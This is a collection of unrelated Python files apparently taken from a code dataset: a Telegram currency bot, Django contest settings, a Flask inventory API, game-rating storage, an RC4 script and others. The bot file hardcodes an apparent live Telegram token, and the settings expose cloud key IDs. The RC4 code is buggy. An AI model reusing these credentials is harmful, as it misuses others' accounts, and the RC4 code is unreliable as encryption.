processor.run()\n\n\nclass UpdateUserSyncHistoryReindexerFactory(ReindexerFactory):\n slug = 'user-sync-history'\n arg_contributors = [\n ReindexerFactory.resumable_reindexer_args,\n ]\n\n def build(self):\n iteration_key = \"UpdateUserSyncHistoryPillow_reindexer\"\n doc_provider = CouchDocumentProvider(iteration_key, doc_type_tuples=[\n CommCareUser,\n WebUser\n ])\n return UserSyncHistoryReindexer(doc_provider, 
**self.options)\n","sub_path":"corehq/pillows/synclog.py","file_name":"synclog.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"367475949","text":"\"\"\"\n 练习1: 将day04/exercise01功能,封装到函数中。\n\n # 在终端中获取一个四位整数,计算每位相加和.\n str_number = input(\"请输入整数:\")\n result = 0\n for item in str_number:\n result += int(item)\n print(result)\n\"\"\"\n\n\ndef each_unit_sum(str_number):\n \"\"\"\n 遍历字符串类型整数的每位,然后求和.\n :param str_number:需要计算的str类型的整数\n :return: 求和的结果\n \"\"\"\n result = 0\n for item in str_number:\n result += int(item)\n return result\n\nre = each_unit_sum(\"12345\")\nprint(re)\nprint(each_unit_sum(\"65788908908965756\"))\n\n\n\n","sub_path":"01-python基础/day07/exercise04.py","file_name":"exercise04.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"36529035","text":"\n\nraw = \"3113322113\"\n#raw = \"1\"\noutput = raw\n#expected = \"132123222113\"\n\n\nfor x in range(50):\n #print(output)\n raw = output\n output = ''\n chain = False\n chainVal = ''\n lastVal = 'x'\n chainCnt = 1\n for i in range(len(raw)):\n\n try:\n if raw[i+1] == raw[i]:\n #start chain \n if chain == False:\n chainCnt = 2\n chain = True\n else:\n chainCnt = chainCnt + 1\n else:\n output = output + str(chainCnt) + raw[i]\n chainCnt = 1\n except IndexError:\n output = output + str(chainCnt) + raw[i]\n chainCnt = 1\n\n \n \n \n lastVal = i\n\n #output = output + str(chainCnt) + lastVal\n\n#print(output)\n\n\n \n #rotated\n #for i in range(int(len(raw)/2)):\n # part = raw[i*2:i*2+2]\n #p0 = int(part[0])\n #p1 = part[1]\n #output = output + p0 * p1\n #raw = output\n\n \n#if i == lastVal:\n# chain = True\n# chainCnt = chainCnt + 1\n# \n# elif (chain == True): #close chain\n# if lastVal == 'x':\n# lastVal = i\n# #print(str(chainCnt) + \" times for lastVal=\" + lastVal)\n# output = output + str(chainCnt) + 
lastVal\n# chain = False\n# chainCnt = 1\n#\n# else:\n# chain = True\n# chainCnt = 1\n","sub_path":"Advent2015/Day/Day10/d10.py","file_name":"d10.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"217442410","text":"#!/usr/bin/python3\nimport configparse_wrapper.cpwrap as cp\nimport Player\nimport TrueSkillWrapper as TS\nfrom fuzzywuzzy import fuzz\nfrom datetime import datetime, timedelta\n\nknown_players = dict()\n\n# care for cpu load #\nplayer_ranks = dict()\nlast_rank_update = datetime.now()\n\ndef load_save():\n with open(\"score.log\") as f:\n for l in f:\n p = Player.PlayerFormDatabase(l)\n known_players[p.steamid] = p\n\ndef save_to_file(fname=\"score.log\"):\n with open(fname,\"w\") as f:\n for p in known_players.values():\n f.write(p.toCSV()+'\\n')\n\ndef get_player_rank(p):\n global player_ranks\n try:\n return str(player_ranks[p])\n except KeyError:\n return \"N/A\"\n\n \ndef dump_rating(top=0, forceMeanSort=False, enforceWhitelist=None):\n global known_players\n ret = \"\"\n if forceMeanSort:\n sort = sorted(known_players.values(),key=lambda x: x.rating.mu,reverse=True)\n else:\n sort = sorted(known_players.values(),key=lambda x: TS.get_env().expose(x.rating),reverse=True)\n if enforceWhitelist:\n sort = list(filter(lambda x: x.name in enforceWhitelist, sort))\n tmp = [\"{} {} mean: {} var: {} WinRatio: {}% ({} Games)\".format(x.get_name().ljust(30),\\\n str(int(TS.get_env().expose(x.rating))).rjust(5),str(int(x.rating.mu)).rjust(4),\\\n str(int(x.rating.sigma)).rjust(4),x.winratio().rjust(4),str(x.games).rjust(3))\\\n for x in sort]\n if top != 0:\n tmp = tmp[:top]\n count = 0\n for s in tmp:\n count += 1\n ret += (\"Rank: \"+str(count).rjust(4) +\" \" + s + \"\\n\") \n return ret\n\ndef sync_from_database(players):\n for p in players:\n #print(\"BKnP: {}\".format(p))\n if p in known_players:\n #print(\"KnP: {}\".format(p))\n p.rating = 
known_players[p].rating\n if type(players) == dict:\n players[p] = p.rating\n else:\n known_players.update({Player.DummyPlayer(p.steamid, p.name):Player.PlayerForDatabase(None,None,None,player=p)})\n\ndef sync_to_database(players,win):\n global last_rank_update\n global player_ranks\n\n for p in players:\n known_players[p].rating = players[p]\n if win:\n known_players[p].wins += 1\n known_players[p].games += 1\n\n # update player ranks #\n if last_rank_update - datetime.now() > timedelta(seconds=240):\n last_rank_update = datetime.now()\n s = sorted(known_players.values(),key=lambda x: TS.get_env().expose(x.rating),reverse=True)\n rank = 1\n for p in s:\n if p in player_ranks:\n player_ranks[p] = rank\n else:\n player_ranks.update({p:rank})\n rank += 1\n\ndef _get_known_players():\n return known_players\n\n\ndef save_event(event):\n return\n\ndef save_psql():\n f=open(\"pass.secret\",'r')\n pw=f.readline().strip();\n f.close()\n PSQL.save(cp.CFG(\"databse_name\"),cp.CFG(\"database_user\"),cp.CFG(\"database_host\"),pw,known_players)\n\ndef fuzzy_find_player(name):\n ret = \"\"\n tup_list = []\n TS.lock()\n try:\n for p in known_players.values():\n sim = fuzz.token_set_ratio(name.lower(),p.name.lower())\n tup_list += [(sim,p)]\n finally:\n TS.unlock()\n return sorted(tup_list,key=lambda x: x[0],reverse=True)[0][1]\n","sub_path":"python/Storrage.py","file_name":"Storrage.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"128664595","text":"import telebot\r\nimport json\r\nimport requests\r\n\r\nTOKEN = '1584797382:AAFFno-eFfdEh35S6MUXNw8gNdMs3yGQ0vg'\r\n\r\nbot = telebot.TeleBot(TOKEN)\r\n\r\nkeys = {\r\n 'биткоин' : 'BTC',\r\n 'эфириум' : 'ETH',\r\n 'доллар' : 'USD'\r\n }\r\n\r\nclass ConvertionException(Exception):\r\n pass\r\n\r\n@bot.message_handler(commands=['start', 'help'])\r\ndef echo_test(message: telebot.types.Message):\r\n text = 'Чтобы начать работу введите 
команду боту в следующем формате:\\nИмя валюты\\n' \\\r\n 'В какую валюту перевести\\n' \\\r\n 'Количество переводимой валюты\\n' \\\r\n 'Увидеть список всех доступных валют: /values'\r\n bot.reply_to(message, text)\r\n\r\n@bot.message_handler(commands=['values'])\r\ndef values(message: telebot.types.Message):\r\n text = 'Доступные валюты:'\r\n for key in keys.keys():\r\n text = '\\n' .join((text, key, ))\r\n bot.reply_to (message, text)\r\n\r\n@bot.message_handler(content_types=['text', ])\r\ndef convert(message: telebot.types.Message):\r\n values = message.text.split(' ')\r\n\r\n if len(values) > 3:\r\n raise ConvertionException('Слишком много параметров.')\r\n\r\n quote, base, amount = values\r\n\r\n if quote == base:\r\n raise ConvertionException(f'Невозможно перевести одинаковые валюты {base}.')\r\n\r\n try:\r\n quote_ticker = keys[quote]\r\n except KeyError:\r\n raise ConvertionException(f'Не удалось обработать валюту {quote}.')\r\n\r\n try:\r\n base_ticker = keys[base]\r\n except KeyError:\r\n raise ConvertionException (f'Не удалось обработать валюту {base}.')\r\n try:\r\n amount = float(amount)\r\n except ValueError:\r\n raise ConvertionException (f'Не удалось обработать количество {amount}.')\r\n\r\n\r\n r = requests.get(f'https://min-api.cryptocompare.com/data/price?fsym={quote_ticker}&tsyms={base_ticker}')\r\n total_base = json.loads(r.content)[keys[base]]\r\n text = f'Цена {amount} {quote} в {base} - {total_base}'\r\n bot.send_message(message.chat.id, text)\r\n\r\nbot.polling()","sub_path":"copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"101960912","text":"from random import *\nimport math\nimport sys\nclass moteC:\n \n \n def __init__(self, locX,locY,moteID):\n self.x = locX\n self.y = locY\n self.ID = moteID\n self.neighborList = []\n self.routeeList =[]\n def addNeighbor(self, neighborMote):\n 
self.neighborList.append(neighborMote)\n \n def euclideanDist(self, mote): \n return math.sqrt(pow(self.x-mote.x,2)+pow(self.y-mote.y,2))\n \n def isNeighbor(self, mote, threshold):\n return threshold>self.euclideanDist(mote)\n \n def addRoutee(self, rout):\n self.routeeList.append(rout)\n \n def setHop(self, hop):\n self.hop = hop\n \n def setBootTime(self,bootTime):\n self.bootTime = bootTime\n \n \ndef readTopology(fileName,r):\n\n f = open(fileName, \"r\")\n\n lines = f.readlines()\n i =0\n for line in lines:\n s = line.split()\n \n if (len(s) > 0):\n if (s[0] == \"gain\"):\n \n #print \" \", s[1], \" \", s[2], \" \", s[3];\n r.add(int(s[1]), int(s[2]), float(s[3]));\n f.close()\n \n \n \ndef getMotelist(fileName, ml):\n f = open(fileName, \"r\")\n lines = f.readlines()\n i =-1\n for line in lines:\n if i>=0:\n s = line.split()\n if(len(s) >0):\n ml.append(moteC(int(s[0]),int(s[1]),i))\n i+=1\n f.close()\n return i\n \ndef getNeighbor(fileName, ml,nN):\n f = open(fileName, \"r\")\n lines = f.readlines()\n i =0\n for line in lines:\n s = line.split()\n if len(s)>0 and i0 and i res else res\n \n return res\n \ndef bfs(target, node):\n queue=[node]\n visited={node}\n hop=0\n while True:\n buf = []\n for n in queue:\n if n.ID == target.ID: return hop\n for nei in n.neighborList:\n if nei not in visited:\n visited.add(nei)\n buf.append(nei)\n del queue[:]\n queue=[i for i in buf]\n hop+=1;\n if hop>10 : return hop \n \ndef getCenter(x,y,areaList):\n if not areaList.any():\n return []\n dis = pow(x-areaList[0].x,2)+pow(y-areaList[0].y,2) \n res = areaList[0]\n for node in areaList:\n curDis = pow(x-node.x,2)+pow(y-node.y,2) \n if dis > curDis:\n dis = curDis\n res = node\n return res\n \n","sub_path":"simulation/Users/0.733074/SimHelper.py","file_name":"SimHelper.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"522496942","text":"# -*- coding: utf-8 -*-\n#\n# 
Copyright © Spyder Project Contributors\n# Licensed under the terms of the MIT License\n# (see spyder/__init__.py for details)\n\n\"\"\"Spyder API Version.\"\"\"\n\nVERSION_INFO = (0, 1, 0)\n__version__ = '.'.join(map(str, VERSION_INFO))\n","sub_path":"spyder/api/_version.py","file_name":"_version.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"584764564","text":"#读取密钥,存放在key中\r\nimport math\r\nimport numpy as np\r\nkey = np.loadtxt( \"Input.txt\",dtype=int,delimiter=' ' )\r\nkeylen = len( key )\r\n\r\n#初始化\r\nS = [ ]\r\nT = [ ]\r\nfor i in range( 0,256 ):\r\n S.append( i )\r\n T.append( key[ i % keylen ] )\r\n\r\n#S的初始置换\r\nj = 0\r\nfor i in range( 0,256 ):\r\n j = ( j + S[ i ] + T[ i ] ) % 256\r\n #swap(S[i],S[j])\r\n temp = S[ i ]\r\n S[ i ] = S[ j ]\r\n S[ j ] = temp\r\n\r\n#读取比特流\r\nwith open( \"bitstream.txt\", \"r\" ) as f: #打开文件\r\n bitstream = f.read( ) #读取文件\r\nM = list( bitstream )\r\nMM = list( map( int, M ) )\r\nif len(MM)!=256*8:\r\n print(\"ERROR\")\r\n exit(0)\r\nMessage=[]\r\nCipher=[0]*256\r\nfor i in range(0,256):\r\n split=MM[i*8:i*8+8]\r\n for j in range(0,len(split)):\r\n temp=temp+math.pow(2,7-j)\r\n Message.append(temp)\r\n\r\ni = j = 0\r\nfor p in range(0,256):\r\n i = (i + 1) % 256\r\n j = (j + S[i]) % 256\r\n #swap(S[i],S[j])\r\n temp = S[ i ]\r\n S[ i ] = S[ j ]\r\n S[ j ] = temp\r\n t = (S[i] + S[j]) % 256\r\n Cipher[i] = MM[i] ^ S[t]\r\nCiphertext=[]\r\nfor i in range(0,256):\r\n temp=str(bin(Cipher[i]))\r\n temp1=temp[2:]\r\n Ciphertext.append(temp1)\r\nresult=\"\".join(Ciphertext)\r\n#输出密文到Ciphertext.txt中\r\nwith open( \"Ciphertext.txt\",\"w\" ) as f:\r\n f.write( result ) \r\n\r\n","sub_path":"RC4.py","file_name":"RC4.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"381844809","text":"def fact(n):\n if n == 0:\n return 1\n else:\n 
return n * fact(n - 1)\ndef fact(m):\n if m == 0:\n return 1\n else:\n return m * fact(m - 1)\nwhile True:\n n = int(input(\"Enter n:\"))\n if n < 0 :\n break\n else:\n m = int(input(\"Enter m:\"))\n a = int(fact(n)/(fact(m)*fact(n - m)))\n print(\"C(%d,%d) = %d\" %(n, m, a))\n","sub_path":"week4/20171675-이인호-assignment4.py","file_name":"20171675-이인호-assignment4.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"348224461","text":"from gi.repository import GLib\n\n# Bluezero modules\nfrom bluezero import adapter\nfrom bluezero import peripheral\n\n# constants\nUART_SERVICE = '6E400001-B5A3-F393-E0A9-E50E24DCCA9E'\nRX_CHARACTERISTIC = '6E400002-B5A3-F393-E0A9-E50E24DCCA9E'\nTX_CHARACTERISTIC = '6E400003-B5A3-F393-E0A9-E50E24DCCA9E'\n\ntx_obj = None\n\n\ndef uart_notify(notifying, characteristic):\n global tx_obj\n if notifying:\n tx_obj = characteristic\n else:\n tx_obj = None\n\n\ndef update_tx(value):\n if tx_obj:\n tx_obj.set_value(value)\n\n\ndef uart_write(value, options):\n print('raw bytes:', value)\n print('With options:', options)\n print('Text value:', bytes(value).decode('utf-8'))\n update_tx(value)\n\n\ndef main(adapter_address):\n ble_uart = peripheral.Peripheral(adapter_address, local_name='BLE UART')\n ble_uart.add_service(srv_id=1, uuid=UART_SERVICE, primary=True)\n ble_uart.add_characteristic(srv_id=1, chr_id=1, uuid=RX_CHARACTERISTIC,\n value=[], notifying=False,\n flags=['write', 'write-without-response'],\n write_callback=uart_write,\n read_callback=None,\n notify_callback=None)\n ble_uart.add_characteristic(srv_id=1, chr_id=2, uuid=TX_CHARACTERISTIC,\n value=[], notifying=False,\n flags=['notify'],\n notify_callback=uart_notify,\n read_callback=None,\n write_callback=None)\n ble_uart.publish()\n\n\nif __name__ == '__main__':\n 
main(list(adapter.Adapter.available())[0].address)\n","sub_path":"examples/ble_uart.py","file_name":"ble_uart.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"292104093","text":"from .base import *\n\nDEBUG = False\nALLOWED_HOSTS = ['hack.lug.ustc.edu.cn']\nMEDIA_ROOT = '/var/opt/hackergame/media'\nSTATIC_ROOT = '/var/opt/hackergame/static'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'hackergame',\n 'USER': 'hackergame',\n 'CONN_MAX_AGE': 60,\n 'ATOMIC_REQUESTS': True,\n },\n}\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n 'LOCATION': '127.0.0.1:11211',\n 'TIMEOUT': 3600,\n 'KEY_PREFIX': 'hackergame',\n },\n}\nSESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = 'mail.s.ustclug.org'\n\nGOOGLE_APP_ID = '2574063612-kstsrirbttbimgk2da2ju1mmbh8t0ogk' \\\n '.apps.googleusercontent.com'\nMICROSOFT_APP_ID = '6a243fe9-a603-4c6e-b6bd-5af20b7f460e'\nSMS_ACCESS_KEY_ID = 'LTAI4FmgeKHNWB7WbTwTP7d9'\n","sub_path":"conf/settings/hackergame.py","file_name":"hackergame.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"283963421","text":"import random\nclass Resistor:\n def __init__(self,x,y,resist,group_in,group_out):\n self.position_x = x\n self.position_y = y\n self.resist = resist\n self.group_in = group_in\n self.group_out = group_out\n\n def show_position(self):\n return([self.position_x,self.position_y,])\n def show_connection(self):\n return([self.group_in,self.group_out])\n\nclass Link:\n def __init__(self,x,y,x2,y2):\n self.position_start_x = x\n self.position_start_y = y\n self.position_end_x = x2\n self.position_end_y = y2\n\n def show_position(self):\n 
print(self.position_start_x,self.position_start_y,self.position_end_x,self.position_end_y)\n\ndef read_object(path):\n object = open(path, 'r')\n ObjectArray = object.read().splitlines()\n\n for index in range(len(ObjectArray)):\n ObjectArray[index] = ObjectArray[index].split()\n print(ObjectArray[1])\n ObjectClassArray = []\n for index in range(len(ObjectArray)):\n if ObjectArray[index][0] == 'Resi' :\n ObjectClassArray.append(Resistor(ObjectArray[index][1],ObjectArray[index][2],ObjectArray[index][3],ObjectArray[index][4],ObjectArray[index][5]))\n\n if ObjectArray[index][0] == 'Link' :\n ObjectClassArray.append(Link(ObjectArray[index][1],ObjectArray[index][2],ObjectArray[index][3],ObjectArray[index][4]))\n\n return(ObjectClassArray[1].show_connection(),'Connection')\n\n\ndef Generate_resistor(range_pos,renge_resist):\n Type = \"Resi\"\n x = random.randrange(0,range_pos,1)\n y = random.randrange(0,range_pos,1)\n resist = random.randrange(0,renge_resist,10)\n return([Type,x,y,resist])\n\ndef Generate_file(path):\n File = open(path,'w')\n FileText=[]\n\n for index in range(10):\n FileText.append(Generate_resistor(10,100))\n\n File.write(str(FileText))\n","sub_path":"Modules/Math.py","file_name":"Math.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"645815199","text":"#creat data set\nvocab = ['go', 'to', 'agent', 'red', 'green', 'blue', 'landmark',\n 'circle', 'triangle', 'continue', 'next', 'ahead', 'done',\n 'good', 'stay', 'goal']\n\ncolors = ['red', 'green', 'blue']\nshapes = ['circle', 'triangle']\n\nsentence_form = [\" agent go to landmark\",\n \" agent go to landmark\",\n \" agent go to landmark\",\n \" agent go to landmark\",\n \" agent go to landmark\",\n \" agent stay\",\n \" agent stay\",\n \" agent stay\",\n \" agent continue\",\n \" agent continue\",\n \" agent continue\",\n \" agent is done\",\n \" agent is done\",\n \" agent is done\"\n \" good job\",\n 
\" good job\",\n \" good job\",\n \"you go girl\"]\n\n\n\ndef create_dataset(res):\n for shape1 in shapes:\n for color1 in colors:\n for shape2 in shapes:\n for color2 in colors:\n tmp = sentence_form.copy()\n tmp = [t.replace(\"\", color1).replace(\"\", shape1).replace(\"\", color2).replace(\"\", shape2) for t in tmp]\n res+=tmp\n print(list(set(res)))\n\n\ncreate_dataset([])","sub_path":"create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386434108","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @File : email_send.py\n# @author : Jaxon\n# @software: PyCharm\n# @datetime: 10/27 027 上午 10:58\nfrom random import Random\nfrom django.core.mail import send_mail\n\nfrom users.models import EmailVerifyRecord\nfrom MxOnline.settings import EMAIL_FROM\n\n\ndef generate_random_str(random_length=10):\n random_str = \"\"\n chars = \"AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789\"\n length = len(chars) - 1\n random = Random()\n for i in range(random_length):\n random_str += chars[random.randint(0, length)]\n return random_str\n\n\ndef send_register_email(email, send_type=\"register\"):\n email_record = EmailVerifyRecord()\n if send_type == \"update_email\":\n random_str = generate_random_str(6)\n else:\n random_str = generate_random_str(20)\n email_record.code = random_str\n email_record.email = email\n email_record.send_type = send_type\n email_record.save()\n\n email_title, email_body = \"\", \"\"\n if send_type == \"register\":\n email_title, email_body = (\n u\"慕学在线网注册激活链接\",\n u\"请将链接复制到浏览器访问以便激活你的账号完成注册:http://127.0.0.1:8000/active/{0}\".format(random_str)\n )\n send_count = 0\n while send_count < 3:\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n if send_status:\n break\n send_count += 1\n\n elif send_type == \"forget\":\n email_title, email_body = (\n u\"慕学在线网密码重置链接\",\n 
u\"请将链接复制到浏览器访问以便重置你的账号密码:http://127.0.0.1:8000/reset/{0}\".format(random_str)\n )\n send_count = 0\n while send_count < 3:\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n if send_status:\n break\n send_count += 1\n\n elif send_type == \"update_email\":\n email_title, email_body = (\n u\"慕学在线邮箱修改验证码\",\n u\"你的邮箱验证码为:{0}\".format(random_str)\n )\n send_count = 0\n while send_count < 3:\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n if send_status:\n break\n send_count += 1\n","sub_path":"apps/utils/email_send.py","file_name":"email_send.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"66273525","text":"import csv\nimport re\nimport urllib\nimport requests\nfrom subprocess import Popen, PIPE\n\n\nPDF_LINK = 'http://nycprop.nyc.gov/nycproperty/StatementSearch'\nTIMEOUT = 15\n\n\ndef get_content(pdf_link):\n try:\n resp = requests.get(pdf_link, timeout=TIMEOUT)\n except requests.exceptions.ReadTimeout:\n raise RuntimeError('fetch timedout')\n except requests.exceptions.ConnectionError:\n raise RuntimeError('connection error')\n except Exception as e:\n raise RuntimeError(str(e))\n\n content = resp.content\n\n html = content.decode('latin1')\n if 'could not be found' in html:\n raise RuntimeError('html pulled - not pdf')\n\n return content\n\n\ndef get_pdf_text(content):\n ps2ascii = Popen(['ps2ascii'], stdin=PIPE, stdout=PIPE,\n stderr=PIPE, shell=True)\n ps2ascii.stdin.write(content)\n ps2ascii.stdin.close()\n pdf_text = ps2ascii.stdout.read().decode()\n ps2ascii.stdout.close()\n ps2ascii.wait()\n return pdf_text\n\n\ndef get_bbl_list(infile):\n with open(infile) as fp:\n reader = csv.reader(fp)\n next(reader) # remove header\n rows = [tuple(map(int, row[:3])) for row in reader]\n\n i = 0\n #for i, tup in enumerate(rows):\n # if tup == (3,1507,4):\n # break\n\n return rows[i:]\n\n\ndef parse_for_charges(text):\n 
match = re.search(r'\\$([\\d,]+)', text)\n try:\n return int(match.groups(1)[0].replace(',', ''))\n except:\n return 0\n\n\ndef get_charges_lines(lines):\n search_strings = (\n 'Unpaid charges, if any',\n 'Outstanding Charges',\n )\n\n return [line for line in lines for search_string in search_strings if search_string in line]\n\n\ndef get_address(lines):\n line = None\n for line in lines:\n line = line.lower()\n if 'property address:' in line:\n break\n\n if line is None:\n return 'NO ADDRESS'\n\n start = line.find('property address:') + len('property address:')\n end = line.find('borough, block & lot:')\n if end == -1:\n return line[start:].strip()\n else:\n return line[start:end].strip()\n\n\ndef get_owner(lines):\n line = None\n for line in lines:\n line = line.lower()\n if 'owner name:' in line:\n break\n\n if line is None:\n return 'NO OWNER'\n\n start = line.find('owner name:') + len('owner name:')\n end = line.find('property address:')\n if end == -1:\n return line[start:].strip()\n else:\n return line[start:end].strip()\n\n\ndef write_row_factory(outfile):\n with open(outfile, 'a') as fp:\n fp.write('borough,block,lot,pdf_link,status,owner,address,due\\n')\n\n def write_row(borough, block, lot, pdf_link,\n status='', owner='', address='', due=''):\n tup = borough, block, lot, pdf_link, status, owner, address, due\n with open(outfile, 'a') as fp:\n writer = csv.writer(fp)\n writer.writerow(tup)\n\n return write_row\n\n\ndef main(infile, outfile):\n\n bbl_list = get_bbl_list(infile)\n\n write_row = write_row_factory(outfile)\n\n #bbl_list = (\n # (3, 4647, 4), # 816 LENOX RD.\n # (3, 4229, 3), # 243 FOUNTAIN AVE.\n # (3, 3690, 2), # 155 WYONA ST\n # (3, 1837, 67), # 77 HALSEY ST\n #)\n\n #bbl_list = ((3, 1343, 41),)\n #bbl_list = ((1, 1918, 159),)\n for borough, block, lot in bbl_list:\n\n query = {\n 'bbl': '{0}{1:05d}{2:04d}'.format(borough, block, lot),\n 'stmtDate': '20170602',\n 'stmtType': 'SOA',\n }\n query_string = urllib.parse.urlencode(query)\n\n 
pdf_link = PDF_LINK + '?' + query_string\n\n try:\n content = get_content(pdf_link)\n except Exception as e:\n write_row(borough, block, lot, pdf_link, str(e))\n continue\n\n text = get_pdf_text(content)\n\n text_lines = text.split('\\n')\n\n address = get_address(text_lines)\n\n owner = get_owner(text_lines)\n\n charge_lines = get_charges_lines(text_lines)\n due = sum(map(parse_for_charges, charge_lines))\n\n status = 'unpaid' if due > 0 else 'paid'\n\n write_row(borough, block, lot, pdf_link,\n status=status, owner=owner, address=address, due=due)\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('infile')\n parser.add_argument('outfile')\n args = parser.parse_args()\n main(args.infile, args.outfile)\n\n","sub_path":"fetch_and_parse_pdf.py","file_name":"fetch_and_parse_pdf.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"121716683","text":"from flask import Flask\nfrom flask_restful import Resource, Api, reqparse\n\napp = Flask(__name__)\napi = Api(app)\n\nWAREHOUSE = {'432.1': 11,\n '432.2': 22,\n '555.1': 0}\n\n\nclass Inventory(Resource):\n\n def generate_key(self, product_id, size):\n return \"{}.{}\".format(product_id, size)\n\n def post(self, product_id, size):\n key = self.generate_key(product_id, size)\n if key in WAREHOUSE.keys():\n return 'Inventory record already exists.', 403\n else:\n WAREHOUSE[key] = 1\n return {key: WAREHOUSE[key]}\n\n def get(self, product_id, size):\n key = self.generate_key(product_id, size)\n return {key: WAREHOUSE[key]}\n\n def put(self, product_id, size):\n key = self.generate_key(product_id, size)\n\n if key in WAREHOUSE.keys():\n WAREHOUSE[key] += 1\n else:\n return 'No inventory record to update. 
First, create.', 403\n return {key: WAREHOUSE[key]}, 200\n\n def delete(self, product_id, size):\n key = self.generate_key(product_id, size)\n if key not in WAREHOUSE.keys():\n return 'No inventory.', 403\n if WAREHOUSE[key] > 0:\n WAREHOUSE[key] -= 1\n else:\n return 'Inventory empty.', 403\n return {key: WAREHOUSE[key]}\n\napi_url = '/inventory//'\n\napi.add_resource(Inventory, api_url)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"591529110","text":"import sys\r\nfrom optparse import OptionParser\r\n\r\nfrom .task_to_app_queue import task_to_app_queue\r\nfrom .run_mitmdump import run_mitmdump\r\n\r\n\r\ndef get_options():\r\n parser = OptionParser()\r\n parser.add_option('-e', '--environment', dest='environment', help='choose environment to run',\r\n metavar='ENVIRONMENT')\r\n # 选择程序运行目标,appium for 操作手机,mitmdump for 数据拦截,mq for 队列合并\r\n parser.add_option('-t', '--type', dest='task_type',\r\n help='choose a process to run: appium, mitmdump or mq', metavar='TASK_TYPE')\r\n\r\n # 队列合并,源队列的名称由内核名称构成\r\n parser.add_option('-s', '--spider', dest='spider_name', help='choose a queue to consume',\r\n metavar='SPIDER')\r\n\r\n parser.add_option('-q', '--queue', dest='queue', help='choose meta or search', metavar='QUEUE')\r\n\r\n return parser.parse_args()\r\n\r\n\r\ndef bootstrap():\r\n (options, args) = get_options()\r\n # 获取环境\r\n if not options.environment:\r\n environment = 'local'\r\n else:\r\n environment = options.environment\r\n # 获取任务类型\r\n task_type = options.task_type\r\n # 获取队列环境 meta or search\r\n queue_env = options.queue\r\n # 获取爬虫名称\r\n spider = options.spider_name\r\n\r\n if task_type == 'mq':\r\n task_to_app_queue(spider_name=spider, environment=environment, queue_env=queue_env)\r\n\r\n if task_type == 'mitmdump':\r\n 
run_mitmdump(environment=environment, queue_env=queue_env)\r\n","sub_path":"auto_mobile/sentiment/commands/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"136390646","text":"import subprocess\n\nip_list = [\"192.168.150.50\", \n \"192.168.150.71\", \n \"192.168.150.75\", \n \"192.168.150.77\", \n \"192.168.150.78\", \n \"192.168.150.91\", \n \"192.168.150.92\", \n \"192.168.150.93\",\n \"www.google.com\"]\n\nwhile True:\n all_restarted = []\n alive = []\n for ip in ip_list:\n command = ip\n ip_id = \"ip_\"+command[-2:]\n if ip_id == \"ip_om\":\n ip_id = \"google\"\n\n \n p = subprocess.Popen(\"screen -ls %s\"%ip_id, shell=True, stdout=subprocess.PIPE).stdout.read()\n p = p.splitlines()[1:][:-1]\n \n if len(p)== 0 :\n all_restarted.append(command)\n subprocess.run([\"screen -dmS %s sudo python3 /var/www/html/python/src/network/network_checker.py %s\" %(ip_id,command)], shell=True)\n else:\n alive.append(command)\n # if len(p) > 1:\n # for id in p:\n # pid = id.split(\".\")[0].replace(\"\\t\",\"\")\n # print (\"screen -R %s -X quit\"%pid)\n # subprocess.run([\"screen -R %s -X quit\"%pid],shell=True) \n \n \n print (\"All restarted monitoring ==> \"),\n print 